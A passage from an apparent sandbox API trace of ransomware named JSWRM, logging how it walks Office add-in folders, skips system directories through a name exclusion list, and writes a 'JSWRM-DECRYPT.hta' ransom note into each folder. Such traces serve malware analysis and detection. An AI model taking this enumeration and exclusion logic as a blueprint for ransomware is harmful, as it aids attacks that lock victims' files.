returned 1 [0123.707] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133f40a9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f13c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ca.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.708] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0123.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0123.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0123.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0123.709] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0123.709] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="...") returned 1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="windows") returned -1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="recovery") returned -1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="perflogs") returned -1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="documents and settings") returned -1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="$RECYCLE.BIN") returned 1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="system volume information") returned -1 [0123.709] lstrcmpiW (lpString1="cs", lpString2="msocache") returned -1 [0123.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0123.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0123.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0123.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0123.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0123.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0123.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\jswrm-decrypt.hta")) returned 0xffffffff [0123.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0123.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0123.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0123.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0123.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.712] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.712] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.713] CloseHandle (hObject=0x314) returned 1 [0123.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0123.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0123.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0123.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0123.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0123.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0123.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0123.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0123.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\jswrm-decrypt.hta")) returned 0x20 [0123.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0123.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0123.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0123.713] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4065c7a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0123.713] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.713] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4065c7a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.714] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.714] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.714] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbda21cf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbda21cf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3ac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.714] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241218, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0123.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0123.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0123.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.714] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4065c7a3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4065c7a3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4065c7a3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.714] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0123.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0123.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0123.715] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ad0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0123.715] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.716] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.716] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0123.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0123.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0123.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.717] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a9d821, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9bf4d66, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4920, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.717] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0123.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", 